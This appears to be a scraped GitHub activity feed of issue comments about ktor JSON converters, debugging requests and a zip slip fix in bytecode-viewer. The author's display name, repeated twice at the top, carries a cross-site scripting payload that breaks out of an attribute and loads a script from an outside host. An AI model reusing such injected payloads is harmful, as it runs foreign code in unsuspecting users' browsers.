Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Have a look at the samples from the existing codebase is my best suggestion. Trial and error will be your friend here. Sorry. One thing I need to get around...
Do you have a stack trace? Also, please use GitHub Markdown formatting for your issues (I updated your issue for you above), it makes it far more readable.
You need to install one of the converters to convert your JSON to the `TestModel`. The simplest way to do that is to either use the ktor plugin for Gson...
I think your next step is to explore this in a debugger and see where you are getting the 415 from. Sorry I can't be of more assistance, but I...
Please open a pull request to resolve this issue if it's impacting you. I'm no longer actively maintaining this project, I'm limited to merging PRs and performing version bumps. I'm...
I thought about allowing annotation based defaults, but I never implemented it. If you have an interest in adding it, please open a PR.
If you read the description, the reason that it edits the code is because your fix for zip slip is insufficient. The change fixes the insufficient guard against the vulnerability.
Friendly ping on this
Ah, you mean this bit of logic here: https://github.com/Konloch/bytecode-viewer/blob/55eaafd2d18fc469cad0d8c4c58ac8e54979c882/src/main/java/the/bytecode/club/bytecodeviewer/util/ZipUtils.java#L48-L50 Indeed I did not see that logic. In that case, your assertion is correct that this is an adequate protection. However,...
Do you have an exception from the log file you can share with us?